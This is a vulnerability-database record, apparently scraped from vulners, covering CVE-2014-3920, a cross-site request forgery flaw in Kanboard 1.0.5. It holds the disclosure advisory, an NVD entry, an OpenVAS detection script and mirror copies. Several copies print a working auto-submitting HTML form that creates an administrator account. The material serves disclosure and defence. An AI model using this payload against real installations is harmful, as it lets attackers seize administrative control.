{"sourceHref": "https://packetstormsecurity.com/files/download/127332/kanboard-xsrf.txt", "sourceData": "`Advisory ID: HTB23217 \nProduct: Kanboard \nVendor: http://kanboard.net/ \nVulnerable Version(s): 1.0.5 and probably prior \nTested Version: 1.0.5 \nAdvisory Publication: May 28, 2014 [without technical details] \nVendor Notification: May 28, 2014 \nVendor Patch: June 30, 2014 \nPublic Disclosure: July 2, 2014 \nVulnerability Type: Cross-Site Request Forgery [CWE-352] \nCVE Reference: CVE-2014-3920 \nRisk Level: Medium \nCVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application. \n \n \n1. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920 \n \nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \n \nSimple CSRF exploit below creates new admin account with login \"immuniweb\" and password \"password\": \n \n \n<form action=\"http://kanboard/?controller=user&action=save\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"immuniweb\"> \n<input type=\"hidden\" name=\"name\" value=\"name\"> \n<input type=\"hidden\" name=\"email\" value=\"mail@mail.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"confirmation\" value=\"password\"> \n<input type=\"hidden\" name=\"default_project_id\" value=\"0\"> \n<input type=\"hidden\" name=\"is_admin\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Kanboard 1.0.6 \n \nMore Information: \nhttp://kanboard.net/news \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/HTB23217 - \u0421ross-Site Request Forgery (CSRF) in Kanboard. \n[2] Kanboard - kanboard.net - A simple and open source visual task board \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "edition": 1, "references": [], "modified": "2014-07-02T00:00:00", "hash": "f7c606ca8dc7e8f165b0a0ff4690e4ec18a857c57f5983743620a71f838b78d3", "cvelist": ["CVE-2014-3920"], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/127332/Kanboard-1.0.5-Cross-Site-Request-Forgery.html", "description": "", "id": "PACKETSTORM:127332", "reporter": "High-Tech Bridge SA", "lastseen": "2016-12-05T22:20:37", "published": "2014-07-02T00:00:00", "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2016-12-05T22:20:37"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3920"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310111063"]}, {"type": "htbridge", "idList": ["HTB23217"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31245", "SECURITYVULNS:VULN:14025"]}, {"type": "zdt", "idList": ["1337DAY-ID-22408"]}], "modified": "2016-12-05T22:20:37"}, "vulnersScore": 6.4}, "objectVersion": "1.2", "type": "packetstorm", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d386d1deb8c56c53c96ecc9d46638a5e", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "8ae6256fb1c513129e75cd11069adecc", "key": "href"}, {"hash": "037eac0795f105ab7015f6eb4c2c17cf", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "037eac0795f105ab7015f6eb4c2c17cf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2690c18dbd5d740269caabcffa541f2b", "key": "reporter"}, {"hash": "7c700b68bf3a5c1d885bc39471dd11b1", "key": "sourceData"}, {"hash": "6c6818284154be3a1c96a9216e820097", "key": "sourceHref"}, {"hash": "b5c2b9e19124bc91da03de560f9af3ec", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "title": "Kanboard 1.0.5 Cross Site Request Forgery", "viewCount": 5, "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}

{"cve": [{"lastseen": "2019-05-29T18:13:46", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.", "modified": "2018-10-09T19:47:00", "id": "CVE-2014-3920", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3920", "published": "2014-07-03T14:55:00", "title": "CVE-2014-3920", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:39", "bulletinFamily": "scanner", "description": "Kanboard is prone to a cross-site request-forgery vulnerability\n because it does not properly validate HTTP requests.", "modified": "2019-03-14T00:00:00", "published": "2015-12-04T00:00:00", "id": "OPENVAS:1361412562310111063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310111063", "title": "Kanboard CVE-2014-3920 Cross Site Request Forgery Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: sw_kanboard_68340.nasl 14184 2019-03-14 13:29:04Z cfischer $\n#\n# Kanboard CVE-2014-3920 Cross Site Request Forgery Vulnerability\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (c) 2015 SCHUTZWERK GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:kanboard:kanboard';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.111063\");\n script_version(\"$Revision: 14184 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 14:29:04 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-04 13:00:00 +0100 (Fri, 04 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2014-3920\");\n script_bugtraq_id(68340);\n script_name(\"Kanboard CVE-2014-3920 Cross Site Request Forgery Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_kanboard_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"kanboard/installed\");\n\n script_tag(name:\"summary\", value:\"Kanboard is prone to a cross-site request-forgery vulnerability\n because it does not properly validate HTTP requests.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"impact\", value:\"Exploiting this issue may allow a remote attacker to perform\n certain unauthorized actions. This may lead to further attacks.\");\n script_tag(name:\"affected\", value:\"Kanboard versions below 1.0.6 are vulnerable.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates listened in the referred advisory.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/68340\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/532619/100/0/threaded\");\n script_xref(name:\"URL\", value:\"http://kanboard.net/news/version-1.0.6\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"1.0.6\" ) ) {\n\n report = 'Installed version: ' + vers + '\\n' +\n 'Fixed version: ' + \"1.0.6\" + '\\n';\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:29", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application. \n \n \n1\\. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920 \n \nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \n \nSimple CSRF exploit below creates new admin account with login \"immuniweb\" and password \"password\": \n \n&lt;form action=\"http://kanboard/?controller=user&amp;action=save\" method=\"post\" name=\"main\"&gt; \n&lt;input type=\"hidden\" name=\"username\" value=\"immuniweb\"&gt; \n&lt;input type=\"hidden\" name=\"name\" value=\"name\"&gt; \n&lt;input type=\"hidden\" name=\"email\" value=\"mail@mail.com\"&gt; \n&lt;input type=\"hidden\" name=\"password\" value=\"password\"&gt; \n&lt;input type=\"hidden\" name=\"confirmation\" value=\"password\"&gt; \n&lt;input type=\"hidden\" name=\"default_project_id\" value=\"0\"&gt; \n&lt;input type=\"hidden\" name=\"is_admin\" value=\"1\"&gt; \n&lt;input type=\"submit\" id=\"btn\"&gt; \n&lt;/form&gt; \n&lt;script&gt; \ndocument.main.submit(); \n&lt;/script&gt;\n", "modified": "2014-06-30T00:00:00", "published": "2014-05-28T00:00:00", "id": "HTB23217", "href": "https://www.htbridge.com/advisory/HTB23217", "type": "htbridge", "title": "Cross-Site Request Forgery (CSRF) in Kanboard", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P/"}}], "zdt": [{"lastseen": "2018-01-01T09:09:10", "bulletinFamily": "exploit", "description": "Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.", "modified": "2014-07-06T00:00:00", "published": "2014-07-06T00:00:00", "id": "1337DAY-ID-22408", "href": "https://0day.today/exploit/description/22408", "type": "zdt", "title": "Kanboard 1.0.5 Cross Site Request Forgery Vulnerability", "sourceData": "Product: Kanboard\r\nVendor: http://kanboard.net/\r\nVulnerable Version(s): 1.0.5 and probably prior\r\nTested Version: 1.0.5\r\nAdvisory Publication: May 28, 2014 [without technical details]\r\nVendor Notification: May 28, 2014 \r\nVendor Patch: June 30, 2014 \r\nPublic Disclosure: July 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-3920\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.\r\n\r\n\r\n1. \u0421ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \r\n\r\nSimple CSRF exploit below creates new admin account with login \"immuniweb\" and password \"password\":\r\n\r\n\r\n<form action=\"http://kanboard/?controller=user&action=save\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"username\" value=\"immuniweb\">\r\n<input type=\"hidden\" name=\"name\" value=\"name\">\r\n<input type=\"hidden\" name=\"email\" value=\"[email\u00a0protected]\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"confirmation\" value=\"password\">\r\n<input type=\"hidden\" name=\"default_project_id\" value=\"0\">\r\n<input type=\"hidden\" name=\"is_admin\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Kanboard 1.0.6\r\n\r\nMore Information:\r\nhttp://kanboard.net/news\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22408"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23217\r\nProduct: Kanboard\r\nVendor: http://kanboard.net/\r\nVulnerable Version&#40;s&#41;: 1.0.5 and probably prior\r\nTested Version: 1.0.5\r\nAdvisory Publication: May 28, 2014 [without technical details]\r\nVendor Notification: May 28, 2014 \r\nVendor Patch: June 30, 2014 \r\nPublic Disclosure: July 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-3920\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 5.1 &#40;AV:N/AC:H/Au:N/C:P/I:P/A:P&#41;\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab &#40; https://www.htbridge.com/advisory/ &#41; \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform \u0421ross-Site Request Forgery &#40;CSRF&#41; attacks and gain complete control over the vulnerable application.\r\n\r\n\r\n1. \u0421ross-Site Request Forgery &#40;CSRF&#41; in Kanboard: CVE-2014-3920\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges. \r\n\r\nSimple CSRF exploit below creates new admin account with login &quot;immuniweb&quot; and password &quot;password&quot;:\r\n\r\n\r\n&lt;form action=&quot;http://kanboard/?controller=user&amp;action=save&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;immuniweb&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;name&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;mail@mail.com&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;password&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;confirmation&quot; value=&quot;password&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;default_project_id&quot; value=&quot;0&quot;&gt;\r\n&lt;input type=&quot;hidden&quot; name=&quot;is_admin&quot; value=&quot;1&quot;&gt;\r\n&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;\r\n&lt;/form&gt;\r\n&lt;script&gt;\r\ndocument.main.submit&#40;&#41;;\r\n&lt;/script&gt;\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Kanboard 1.0.6\r\n\r\nMore Information:\r\nhttp://kanboard.net/news\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/HTB23217 - \u0421ross-Site Request Forgery &#40;CSRF&#41; in Kanboard.\r\n[2] Kanboard - kanboard.net - A simple and open source visual task board\r\n[3] Common Vulnerabilities and Exposures &#40;CVE&#41; - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration &#40;CWE&#41; - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service &#40;SaaS&#41; model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided &quot;as is&quot; and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31245", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31245", "title": "Cross-Site Request Forgery &#40;CSRF&#41; in Kanboard", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:VULN:14025", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14025", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}